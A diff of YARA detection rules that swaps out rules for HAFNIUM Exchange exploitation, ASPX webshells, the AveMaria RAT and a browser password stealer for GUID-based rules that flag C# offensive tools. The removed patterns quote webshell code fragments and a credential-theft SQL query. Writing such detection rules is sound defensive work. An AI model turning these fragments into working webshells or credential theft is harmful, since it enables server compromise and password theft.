-		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L218-L233"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "91824d18-f46b-5b95-b650-4d710d711cf9"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/valsov/BackNet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1879-L1899"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "933ab74a0e30e2a728444d491c9eb0ff134db05d905aeb48efe3ba65674a3730"
-		score = 85
-		quality = 79
+		logic_hash = "f1814ad6f6f96f9a9efc6d684c4e19203d84b191c0eef801c18f5b67787892bb"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<%@Page Language=\"Jscript\"%>" ascii wide nocase
-		$s2 = ".FromBase64String(" ascii wide nocase
-		$s3 = "eval(System.Text.Encoding." ascii wide nocase
+		$typelibguid0lo = "9fdae122-cd1e-467d-a6fa-a98c26e76348" ascii wide
+		$typelibguid0up = "9FDAE122-CD1E-467D-A6FA-A98C26E76348" ascii wide
+		$typelibguid1lo = "243c279e-33a6-46a1-beab-2864cc7a499f" ascii wide
+		$typelibguid1up = "243C279E-33A6-46A1-BEAB-2864CC7A499F" ascii wide
+		$typelibguid2lo = "a7301384-7354-47fd-a4c5-65b74e0bbb46" ascii wide
+		$typelibguid2up = "A7301384-7354-47FD-A4C5-65B74E0BBB46" ascii wide
+		$typelibguid3lo = "982dc5b6-1123-428a-83dd-d212490c859f" ascii wide
+		$typelibguid3up = "982DC5B6-1123-428A-83DD-D212490C859F" ascii wide
 
 	condition:
-		filesize < 850 and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_HAFNIUM_Forensicartefacts_WER_Mar21_1 : CVE_2021_26857 FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Allthethings : FILE
 {
 	meta:
-		description = "Detects a Windows Error Report (WER) that indicates and exploitation attempt of the Exchange server as described in CVE-2021-26857 after the corresponding patches have been applied. WER files won't be written upon successful exploitation before applying the patch. Therefore, this indicates an unsuccessful attempt."
-		author = "Florian Roth (Nextron Systems)"
-		id = "06771101-10ce-5d6b-99f7-a321aade7f69"
-		date = "2021-03-07"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1368471533048446976"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L235-L250"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c35160cb-ad31-5195-a7c6-0af91a58737d"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/johnjohnsp1/AllTheThings"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1901-L1915"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2e135cb47f9fb5ca19ee1058fa6b4f39c098d2dfbab69bc19e80412ab695f126"
-		score = 40
+		logic_hash = "09836251d75327ef547451024ffed76de8cf41ce027fbf40db0cac44f74d46d5"
+		score = 75
 		quality = 85
-		tags = "CVE-2021-26857, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "AppPath=c:\\windows\\system32\\inetsrv\\w3wp.exe" wide fullword
-		$s7 = ".Value=w3wp#MSExchangeECPAppPool" wide
+		$typelibguid0lo = "0547ff40-5255-42a2-beb7-2ff0dbf7d3ba" ascii wide
+		$typelibguid0up = "0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA" ascii wide
 
 	condition:
-		uint16( 0 ) == 0xfeff and filesize < 8KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_HAFNIUM_Forensicartefacts_Cab_Recon_Mar21_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Addreferencedotredteam : FILE
 {
 	meta:
-		description = "Detects suspicious CAB files used by HAFNIUM for recon activity"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b0caf9d9-af0a-5181-85e4-6091cd6699e3"
-		date = "2021-03-11"
-		modified = "2023-12-05"
-		reference = "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3?u=dstepanic"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L252-L273"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "59299a72-9b7a-5108-81c2-d8f6d2e99b20"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/ceramicskate0/AddReferenceDotRedTeam"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1917-L1931"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "de3acb2d01ad14d73263af9e62ef7c715cde259e3f2fbbcbbb41d55589c3f0ab"
-		score = 70
+		logic_hash = "34717e4864a7dc5c21525be09fcfe87da6b18e56b1956e5a34b0a669d8d6ab45"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "ip.txt" ascii fullword
-		$s2 = "arp.txt" ascii fullword
-		$s3 = "system" ascii fullword
-		$s4 = "security" ascii fullword
+		$typelibguid0lo = "73c79d7e-17d4-46c9-be5a-ecef65b924e4" ascii wide
+		$typelibguid0up = "73C79D7E-17D4-46C9-BE5A-ECEF65B924E4" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x4643534d and filesize < 10000KB and ( $s1 in ( 0 .. 200 ) and $s2 in ( 0 .. 200 ) and $s3 in ( 0 .. 200 ) and $s4 in ( 0 .. 200 ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Compiled_Webshell_Mar2021_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Crypter : FILE
 {
 	meta:
-		description = "Triggers on temporary pe files containing strings commonly used in webshells."
-		author = "Bundesamt fuer Sicherheit in der Informationstechnik"
-		id = "9336bd2c-791c-5c3e-9733-724a6a23864a"
-		date = "2021-03-05"
-		modified = "2021-03-12"
-		reference = "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L275-L295"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "484c7a15-7ab2-57d3-848c-0fddff753d52"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/Lime-Crypter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1933-L1947"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d2e5f91f7bb50984c491eb9632d3863febc986760e4d03c8255872887ce4dc4a"
+		logic_hash = "45a47b8ed17b157e22e6819f08a245aca2930d276b52d781fbbc82bcfb184ab4"
 		score = 75
-		quality = 56
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = /App_Web_[a-zA-Z0-9]{7,8}.dll/ ascii wide fullword
-		$a1 = "~/aspnet_client/" ascii wide nocase
-		$a2 = "~/auth/" ascii wide nocase
-		$b1 = "JScriptEvaluate" ascii wide fullword
-		$c1 = "get_Request" ascii wide fullword
-		$c2 = "get_Files" ascii wide fullword
-		$c3 = "get_Count" ascii wide fullword
-		$c4 = "get_Item" ascii wide fullword
-		$c5 = "get_Server" ascii wide fullword
+		$typelibguid0lo = "f93c99ed-28c9-48c5-bb90-dd98f18285a6" ascii wide
+		$typelibguid0up = "F93C99ED-28C9-48C5-BB90-DD98F18285A6" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 5KB and filesize < 40KB and all of ( $x* ) and 1 of ( $a* ) and ( all of ( $b* ) or all of ( $c* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_MAL_ASP_DLL_HAFNIUM_Mar21_1 : FILE
+
+rule SIGNATURE_BASE_HKTL_NET_GUID_Browserghost : FILE
 {
 	meta:
-		description = "Detects HAFNIUM compiled ASP.NET DLLs dropped on compromised servers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "68b8252e-a07d-5507-b556-a4d473f98157"
-		date = "2021-03-05"
-		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L297-L325"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "adcc5d12-c393-5708-ae0b-a85f2187c881"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/QAX-A-Team/BrowserGhost"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1949-L1965"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a4a3f9c7029e67647823a13079655b24648f5e4a7e238439b7a933b19477c20c"
-		score = 65
+		logic_hash = "1f9bdf4881a71c429cf20e7a635f054a4a340f335767cb22ecc8024bcc57e53b"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "097f5f700c000a13b91855beb61a931d34fb0abb738a110368f525e25c5bc738"
-		hash2 = "15744e767cbaa9b37ff7bb5c036dda9b653fc54fc9a96fe73fbd639150b3daa3"
-		hash3 = "52ae4de2e3f0ef7fe27c699cb60d41129a3acd4a62be60accc85d88c296e1ddb"
-		hash4 = "5f0480035ee23a12302c88be10e54bf3adbcf271a4bb1106d4975a28234d3af8"
-		hash5 = "6243fd2826c528ee329599153355fd00153dee611ca33ec17effcf00205a6e4e"
-		hash6 = "ebf6799bb86f0da2b05e66a0fe5a9b42df6dac848f4b951b2ed7b7a4866f19ef"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Page_Load" ascii fullword
-		$sc1 = { 20 00 3A 00 20 00 68 00 74 00 74 00 70 00 3A 00
-               2F 00 2F 00 (66|67) 00 2F 00 00 89 A3 0D 00 0A 00 }
-		$op1 = { 00 43 00 58 00 77 00 30 00 4a 00 45 00 00 51 7e 00 2f }
-		$op2 = { 58 00 77 00 30 00 4a 00 45 00 00 51 7e 00 2f 00 61 00 }
-		$op3 = { 01 0e 0e 05 20 01 01 11 79 04 07 01 12 2d 04 07 01 12 31 02 }
-		$op4 = { 5e 00 03 00 bc 22 00 00 00 00 01 00 85 03 2b 00 03 00 cc }
+		$typelibguid0lo = "2133c634-4139-466e-8983-9a23ec99e01b" ascii wide
+		$typelibguid0up = "2133C634-4139-466E-8983-9A23EC99E01B" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of ( $s* ) or all of ( $op* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them and not pe.is_dll ( )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Fileexplorer_Mar21_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshot : FILE
 {
 	meta:
-		description = "Detects Chopper like ASPX Webshells"
-		author = "Florian Roth (Nextron Systems)"
-		id = "edcaa2a8-6fea-584e-90c2-307a2dfc9f7f"
-		date = "2021-03-31"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L363-L397"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9d59cd53-53b1-57db-b391-eee4dd6feec0"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/tothi/SharpShot"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1967-L1981"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7b4ffd222b38e76455fff2650b72bdcaff281323103f342b427013cd3fffdc21"
-		score = 80
+		logic_hash = "843e7bb327314749a58e3d44356fcd9d7a2c349cb429f5bc593044894f17a15c"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "<span style=\"background-color: #778899; color: #fff; padding: 5px; cursor: pointer\" onclick=" ascii
-		$xc1 = { 3C 61 73 70 3A 48 69 64 64 65 6E 46 69 65 6C 64
-               20 72 75 6E 61 74 3D 22 73 65 72 76 65 72 22 20
-               49 44 3D 22 ?? ?? ?? ?? ?? 22 20 2F 3E 3C 62 72
-               20 2F 3E 3C 62 72 20 2F 3E 20 50 72 6F 63 65 73
-               73 20 4E 61 6D 65 3A 3C 61 73 70 3A 54 65 78 74
-               42 6F 78 20 49 44 3D }
-		$xc2 = { 22 3E 43 6F 6D 6D 61 6E 64 3C 2F 6C 61 62 65 6C
-               3E 3C 69 6E 70 75 74 20 69 64 3D 22 ?? ?? ?? ??
-               ?? 22 20 74 79 70 65 3D 22 72 61 64 69 6F 22 20
-               6E 61 6D 65 3D 22 74 61 62 73 22 3E 3C 6C 61 62
-               65 6C 20 66 6F 72 3D 22 ?? ?? ?? ?? ?? 22 3E 46
-               69 6C 65 20 45 78 70 6C 6F 72 65 72 3C 2F 6C 61
-               62 65 6C 3E 3C 25 2D 2D }
-		$r1 = "(Request.Form[" ascii
-		$s1 = ".Text + \" Created!\";" ascii
-		$s2 = "DriveInfo.GetDrives()" ascii
-		$s3 = "Encoding.UTF8.GetString(FromBase64String(str.Replace(" ascii
-		$s4 = "encodeURIComponent(btoa(String.fromCharCode.apply(null, new Uint8Array(bytes))));;"
+		$typelibguid0lo = "057aef75-861b-4e4b-a372-cfbd8322c8e1" ascii wide
+		$typelibguid0up = "057AEF75-861B-4E4B-A372-CFBD8322C8E1" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) or 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Chopper_Like_Mar21_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Offensive__NET : FILE
 {
 	meta:
-		description = "Detects Chopper like ASPX Webshells"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a4dc1880-865f-5e20-89a2-3a642c453ef9"
-		date = "2021-03-31"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L399-L416"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b98495fb-0338-5042-a7ce-d117204eb91e"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/mrjamiebowman/Offensive-.NET"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1983-L1997"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "baa9eb1e3c4ac5ce49d27b1c3f75c8b6590567e25d98761a8b704478f2cee970"
-		score = 85
+		logic_hash = "c26d29934fe3f7575ce1cd56bcf2571e95d5705bccdb1ca211ca7d46765d0fb4"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "ac44513e5ef93d8cbc17219350682c2246af6d5eb85c1b4302141d94c3b06c90"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://f/<script language=\"JScript\" runat=\"server\">var _0x" ascii
-		$s2 = "));function Page_Load(){var _0x" ascii
-		$s3 = ";eval(Request[_0x" ascii
-		$s4 = "','orange','unsafe','" ascii
+		$typelibguid0lo = "11fe5fae-b7c1-484a-b162-d5578a802c9c" ascii wide
+		$typelibguid0up = "11FE5FAE-B7C1-484A-B162-D5578A802C9C" ascii wide
 
 	condition:
-		filesize < 3KB and 1 of them or 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_Avemaria_RAT_Jul19 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ruralbishop : FILE
 {
 	meta:
-		description = "Detects AveMaria RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "960048cf-7a56-50cf-8498-549f900770d8"
-		date = "2019-07-01"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/abuse_ch/status/1145697917161934856"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_avemaria_rat.yar#L2-L16"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8fd89465-1ecc-5eda-b2ab-273172ad945d"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/rasta-mouse/RuralBishop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1999-L2013"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a848ec579db6a07faeab5c855a56889b4bfeaa2958d0388f7fe8c6dcdea7e457"
+		logic_hash = "ee349395cbb2c692afcbdd0a6bce52d19762ec45b64cca684b60b148a1edd2d5"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5a927db1566468f23803746ba0ccc9235c79ca8672b1444822631ddbf2651a59"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "operator co_await" fullword ascii
-		$s1 = "uohlyatqn" fullword ascii
-		$s2 = "index = [%d][%d][%d][%d]" fullword ascii
+		$typelibguid0lo = "fe4414d9-1d7e-4eeb-b781-d278fe7a5619" ascii wide
+		$typelibguid0up = "FE4414D9-1D7E-4EEB-B781-D278FE7A5619" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_Buckeye_Osinfo : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Deviceguardbypasses : FILE
 {
 	meta:
-		description = "Detects OSinfo tool used by the Buckeye APT group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e40a86d1-fd1a-5430-b7b7-8cc7ca128cc5"
-		date = "2016-09-05"
-		modified = "2025-03-19"
-		reference = "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_buckeye.yar#L10-L29"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3790faac-b5be-5999-b35f-71a2ef02b6ed"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/tyranid/DeviceGuardBypasses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2015-L2039"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "782ae4293db0839190a9533d2c45baff92527867bfcd048ccae82611f165601b"
-		score = 70
+		logic_hash = "b9fcec2e6641e961f2007dd1de1822fd0e0bcf9614fdd9e1110ac4fd40a89fd8"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "-s ShareInfo ShareDir" fullword ascii
-		$s2 = "-a Local And Global Group User Info" fullword ascii
-		$s3 = "-f <infile> //input server list from infile, OneServerOneLine" fullword ascii
-		$s4 = "info <\\server> <user>" fullword ascii
-		$s5 = "-c Connect Test" fullword ascii
-		$s6 = "-gd Group Domain Admins" fullword ascii
-		$s7 = "-n NetuseInfo" fullword ascii
+		$typelibguid0lo = "f318466d-d310-49ad-a967-67efbba29898" ascii wide
+		$typelibguid0up = "F318466D-D310-49AD-A967-67EFBBA29898" ascii wide
+		$typelibguid1lo = "3705800f-1424-465b-937d-586e3a622a4f" ascii wide
+		$typelibguid1up = "3705800F-1424-465B-937D-586E3A622A4F" ascii wide
+		$typelibguid2lo = "256607c2-4126-4272-a2fa-a1ffc0a734f0" ascii wide
+		$typelibguid2up = "256607C2-4126-4272-A2FA-A1FFC0A734F0" ascii wide
+		$typelibguid3lo = "4e6ceea1-f266-401c-b832-f91432d46f42" ascii wide
+		$typelibguid3up = "4E6CEEA1-F266-401C-B832-F91432D46F42" ascii wide
+		$typelibguid4lo = "1e6e9b03-dd5f-4047-b386-af7a7904f884" ascii wide
+		$typelibguid4up = "1E6E9B03-DD5F-4047-B386-AF7A7904F884" ascii wide
+		$typelibguid5lo = "d85e3601-0421-4efa-a479-f3370c0498fd" ascii wide
+		$typelibguid5up = "D85E3601-0421-4EFA-A479-F3370C0498FD" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $s* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_Remotecmd : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_AMSI_Handler : FILE
 {
 	meta:
-		description = "Detects a remote access tool used by APT groups - file RemoteCmd.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "384f37f3-4562-5d79-9793-0384c43d4602"
-		date = "2016-09-08"
-		modified = "2022-12-21"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_buckeye.yar#L31-L51"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "40768acf-fa9e-531a-83fd-187814ddc2d4"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/two06/AMSI_Handler"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2041-L2061"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "873cc02674e386577e86cb9b702265c25dd24b1f203741e8628e30c191dc99e0"
-		score = 70
+		logic_hash = "cebfce69d60ca00e3d824bb75b36efc0c53b695c502a39601dee1e418af52766"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5264d1de687432f8346617ac88ffcb31e025e43fc3da1dad55882b17b44f1f8b"
 
 	strings:
-		$s1 = "RemoteCmd.exe" fullword wide
-		$s2 = "\\Release\\RemoteCmd.pdb" ascii
-		$s3 = "RemoteCmd [ComputerName] [Executable] [Param1] [Param2] ..." fullword wide
-		$s4 = "http://{0}:65101/CommandEngine" fullword wide
-		$s5 = "Brenner.RemoteCmd.Client" fullword ascii
-		$s6 = "$b1888995-1ee5-4f6d-82df-d2ab8ae73d63" fullword ascii
+		$typelibguid0lo = "d829426c-986c-40a4-8ee2-58d14e090ef2" ascii wide
+		$typelibguid0up = "D829426C-986C-40A4-8EE2-58D14E090EF2" ascii wide
+		$typelibguid1lo = "86652418-5605-43fd-98b5-859828b072be" ascii wide
+		$typelibguid1up = "86652418-5605-43FD-98B5-859828B072BE" ascii wide
+		$typelibguid2lo = "1043649f-18e1-41c4-ae8d-ac4d9a86c2fc" ascii wide
+		$typelibguid2up = "1043649F-18E1-41C4-AE8D-AC4D9A86C2FC" ascii wide
+		$typelibguid3lo = "1d920b03-c537-4659-9a8c-09fb1d615e98" ascii wide
+		$typelibguid3up = "1D920B03-C537-4659-9A8C-09FB1D615E98" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 2 of them ) or ( 4 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_Chromepass : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_RAT_Telegramspybot : FILE
 {
 	meta:
-		description = "Detects a tool used by APT groups - file ChromePass.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "950b9761-bdfd-514b-90ea-a1454d35ce5a"
-		date = "2016-09-08"
-		modified = "2025-03-10"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_buckeye.yar#L53-L77"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "57d22201-a051-5040-927c-30da3fc684fd"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/SebastianEPH/RAT.TelegramSpyBot"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2063-L2077"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bda90d2718be5cf9ddb95b88171c937c5fad5729aa1717a13a34a8b48dd1865c"
+		logic_hash = "ed661d6513df3a3e8558912f96f86bff55214f9ba6426085af8458a5c9c62d1f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5ff43049ae18d03dcc74f2be4a870c7056f6cfb5eb636734cca225140029de9a"
 
 	strings:
-		$x1 = "\\Release\\ChromePass.pdb" ascii
-		$x2 = "Windows Protect folder for getting the encryption keys" wide
-		$x3 = "Chrome User Data folder where the password file is stored" wide
-		$s1 = "Opera Software\\Opera Stable\\Login Data" fullword wide
-		$s2 = "Yandex\\YandexBrowser\\User Data\\Default\\Login Data" fullword wide
-		$s3 = "Load the passwords from another Windows user or external drive: " fullword wide
-		$s4 = "Windows Login Password:" fullword wide
-		$s5 = "SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created fr" ascii
-		$s6 = "Chrome Password Recovery" fullword wide
+		$typelibguid0lo = "8653fa88-9655-440e-b534-26c3c760a0d3" ascii wide
+		$typelibguid0up = "8653FA88-9655-440E-B534-26C3C760A0D3" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) ) or ( 5 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Crime_Ole_Loadswf_Cve_2018_4878 : PURPORTED_NORTH_KOREAN_ACTORS CVE_2018_4878 FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Thehacktoolboxteek : FILE
 {
 	meta:
-		description = "Detects CVE-2018-4878"
-		author = "Vitali Kremez, Flashpoint"
-		id = "44797bbc-693b-5fcb-a4a4-4ebf3f4da725"
-		date = "2025-01-01"
-		modified = "2023-12-05"
